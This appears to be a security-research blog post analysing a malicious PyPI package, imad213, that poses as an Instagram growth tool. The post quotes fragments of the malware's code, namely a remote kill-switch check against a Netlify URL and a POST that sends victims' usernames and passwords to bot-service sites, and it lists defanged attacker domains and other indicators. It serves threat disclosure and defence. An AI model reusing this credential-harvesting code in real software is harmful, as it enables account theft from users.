PyPI Package Disguised as Instagram Growth Tool Harvests User Credentials

I just wanted more Instagram followers. Now someone has my password!

Socket's Threat Research Team discovered a Python-based credential harvester imad213 claiming to be an Instagram growth tool, created by threat actor im_ad__213 (email: madmadimado59@gmail[.]com). The malware uses base64 encoding to hide its true nature and implements a remote kill switch through a Netlify-hosted control file. When executed, it prompts users for Instagram credentials, and broadcasts them to ten different third-party bot services while pretending to boost follower counts.

Interestingly, the threat actor has created multiple malicious tools beyond this Instagram credential harvester:

1. Free Fire Phishing Kits: Creates fake game reward pages using Flask and ngrok to harvest Facebook, Gmail, Twitter, and VK credentials [taya , a-b27]
2. DDoS Attack Tool: Uses Apache Bench to target streaming platforms and APIs with flood attacks [poppo213]

All tools share consistent branding ("IMAD-213"), identical ASCII art, and similar coding patterns, indicating a single threat actor building a diverse attack toolkit.

How Users Find and Trust This Malware#

The imad213 package presents itself professionally on GitHub with a detailed README advertising Instagram growth features:

*imad213's README on Github*

The README even includes a deceptive safety tip: "Requires a Temporary Account: Safely use a fake or temporary Instagram account to avoid risks to your main account." This creates false security, users think they're being cautious while still handing over valid credentials to the attacker.

This legitimate appearance, combined with simple installation instructions (pip install imad213), convinces users they're downloading a real Instagram tool. The package likely spreads through forums and Discord servers where users share "growth hacks".

When executed, the tool's "INSTA-FOLLOWERS" branding reinforces users' expectations, making them comfortable entering credentials they believe will be used for legitimate growth services.

Remote Kill Switch: The Attacker's Control Mechanism#

Before stealing any credentials, the malware first connects to the attacker's server to check if it's allowed to run. It connects to a file hosted on Netlify (https://imad-213-imad21[.]netlify[.]app/pass[.]txt) and looks for a specific password. This check happens automatically in the background, without any indications to the victim. The attacker controls this file and can change it anytime.

def check_initial_request():
    url = "https://imad-213-imad21[.]netlify[.]app/pass[.]txt"
    try:
        response = requests.get(url)
        if response.status_code == 200:
            content = response.text.strip()# Read control file
            if content == "imad213":# Authentication check
                print(f"{GREEN}INSTAGRAM-LOGIN{RESET}")
                return True
            else:
                print(f"{RED}IMAD-213{RESET}")
                return False

Why implement this kill switch? Several reasons:

1. Control Who Uses It: The attacker might sell this tool to specific people. By changing the control file, they can enable or disable access for everyone.
2. Emergency Shutdown: If law enforcement starts investigating, the attacker can change one file on Netlify, and every copy of the malware worldwide stops working instantly.
3. Avoid Detection: Security researchers analyzing the malware might find it disabled, making it harder to understand how it works.
4. Self-Promotion: When disabled, the tool opens the attacker's Instagram profile (nasreddin_imad), essentially advertising: "Follow me for more hacking tools."

This gives the attacker remote control over their malware, like having a master switch that can turn off all copies at once, without victims ever knowing this check is happening.

Local Credential Storage as Social Engineering#

After passing the remote check, the tool prompts for Instagram credentials. The malware writes usernames and passwords directly to credentials.txt in plaintext on the victim's own machine. The Arabic comments in the code (which translate to "Function to save account data in file") may indicate clues about the threat actor while attempting to obscure the code's purpose from casual inspection.

# دالة لحفظ بيانات الحساب في ملف
def save_credentials(username, password):
    with open("credentials.txt", "w") as file:
        file.write(f"{username}\n{password}")
    print("Credentials saved successfully.")

This local storage serves as social engineering, making the tool appear legitimate with a "convenience" feature for saving login details. However, the real attack happens in the next phase.

Credential Broadcast to Unknown Bot Services#

Here's where the attack becomes particularly dangerous: the victim's Instagram username and password aren't just saved locally, they're broadcast to ten different bot service websites. The attack links to Turkish bot services that poses as a legitimate Instagram growth service, complete with professional-looking landing pages and login forms, but in the backend receives the complete login credentials:

login_data = {
    "username": username,# Your actual Instagram username
    "password": password,# Your actual Instagram password
    "userid": "",
    "antiForgeryToken": "5e65770c2420a986097445ab74b0e24b"
}
# This same data is sent to ALL 10 services
response = session.post(login_url, headers=headers, data=login_data)

These sites display warnings like "This site has no connection to Instagram" and "Your transactions are performed using your username and password and the Instagram API system" to appear transparent. However, victims have no visibility into what actually happens with their credentials once submitted. The services could be:

• Storing credentials in databases for later use
• Selling login information on underground markets
• Using accounts for spam or bot networks
• Harvesting personal data and follower lists
• Sharing credentials with other malicious actors

Malicious website takipcimx[.]net poses as a legitimate Instagram growth service complete with professional-looking landing pages and login forms.

The bot services receiving credentials include:

• takipcimx[.]net
• takipcizen[.]com
• bigtakip[.]net
• takip88[.]com
• takipciking[.]net
• takipcigen[.]com
• takipcikrali[.]com
• takipcitime[.]net
• instamoda[.]org

Analysis of Bot Service Infrastructure#

Our investigation into the bot services receiving Instagram credentials reveals an advanced, coordinated operation. These aren't independent websites but rather a network of related services designed to harvest credentials at scale.

VirusTotal detects takipcimx[.]net as malicious, with vendors including Kaspersky flagging it for phishing activity.

WHOIS records confirm the malicious domains share the same Turkish registrar, privacy protection, and were registered within the same week.

Key patterns across all investigated domains:

• Registered through the same Turkish telecom company
• Created within days of each other in June 2021
• Use identical privacy protection services
• Share Cloudflare infrastructure for DDoS protection
• All actively maintained with recent updates

This coordination strongly suggests these sites are operated by the same entity. The infrastructure has been operational for nearly four years, indicating a long-term credential harvesting operation rather than a temporary scam.

Real-World Impact#

Instagram has over 2 billion monthly active users, making it a prime target for both legitimate marketers and malicious actors. The platform's engagement-driven algorithm has spawned a cottage industry of growth tools promising instant followers, likes, and views. While Instagram's API supports legitimate automation for business accounts, underground services bypass these restrictions entirely. According to Instagram's Community Guidelines, using third-party apps to artificially inflate metrics can result in immediate account suspension or permanent bans.

Users who run this tool face multiple consequences:

• Immediate Account Compromise: Credentials are shared with 10+ external services that can access private messages, post content, or change passwords
• Instagram Policy Violations: Using bot services violates Instagram's Terms of Use, which explicitly prohibits:
  • Using automated means to collect information or interact with the service
  • Creating accounts or accessing content through unauthorized methods
  • Buying, selling, or transferring any aspect of your account (including your username) Violations can result in:
    • Account suspension or permanent termination
    • Reduced distribution of content (often called "shadowbanning")
    • Removal of inauthentic followers, likes, and comments
    • Legal action in severe cases
• Password Reuse Risk: If victims use the same password elsewhere, multiple accounts become vulnerable
• Identity Theft Potential: Compromised Instagram accounts contain personal photos, direct messages, and connections to other social media accounts

Outlook and Recommendations#

The emergence of this credential harvester reveals concerning trends in social media-targeted malware. As Instagram and other platforms continue to crack down on bot services, we expect attackers to evolve their tactics in several ways

Distributed Infrastructure: The use of Netlify for remote control suggests future malware may increasingly leverage legitimate hosting services to avoid detection. Attackers could expand to GitHub Pages, Vercel, or other free platforms that security tools typically trust, making kill switches harder to identify and block.

Credential Laundering Networks: With ten different bot services receiving credentials, we're seeing the early stages of credential laundering—where stolen logins are distributed across multiple services to obscure their origin. Future variants may incorporate cryptocurrency payments or use decentralized networks to create untraceable credential marketplaces.

Social Engineering Evolution: The local credential storage feature, while seemingly pointless, demonstrates convincing social engineering. Future iterations might include fake "security features" like bogus two-factor authentication or password strength meters to increase victim trust and capture additional security information.

Cross-Platform Targeting: Given that the same threat actor created Free Fire phishing kits and DDoS tools, we anticipate more unified attack frameworks that can target multiple platforms simultaneously. A single toolkit could harvest Instagram, TikTok, gaming, and banking credentials while maintaining the same command infrastructure.

Socket's security tools can help protect against these threats by analyzing package behaviors in real-time to detect dangerous patterns like those seen in this campaign. Our free GitHub app flags risks directly in pull requests, the CLI alerts during package installations, and our browser extension provides security insights on npm package pages helping developers identify potential supply chain threats before they enter your codebase.

Similar Research#

The consistent targeting of Instagram, TikTok, Telegram, and other social media platforms highlights their value to threat actors. With billions of active users and often-reused passwords across platforms, compromising one social media account frequently provides access to others, creating a domino effect that amplifies the impact of credential theft campaigns.

• malicious-checker-packages-on-pypi-probe-tiktok-and-instagram
• malicious-ruby-gems-exfiltrate-telegram-tokens-and-messages-following-vietnam-ban

Indicators of Compromise (IOCs)#

• Threat Actor Identifiers
  • Pypi alias: im_ad__213 or IMAD-213
  • PyPi registered email: madmadimado59@gmail[.]com
  • Github: https://github[.]com/imadoo27/
• Control URL: imad-213-imad21.netlify[.]app/pass.txt
• Attacker's Instagram: instagram[.]com/nasreddin_imad
• Bot Services:
  • takipcimx[.]net
  • takipcizen[.]com
  • bigtakip[.]net
  • takip88[.]com
  • takipciking[.]net
  • takipcigen[.]com
  • takipcikrali[.]com
  • takipcitime[.]net
  • instamoda[.]org
• Local File: credentials.txt (plaintext storage)
• Anti-forgery Token: 5e65770c2420a986097445ab74b0e24b

MITRE ATT&CK Techniques#

• T1027 — Obfuscated Files or Information
• T1566.002 — Phishing
• T1041 — Exfiltration over C2 channel
• T1195.002 — Supply Chain Compromise: Compromise Software Supply Chain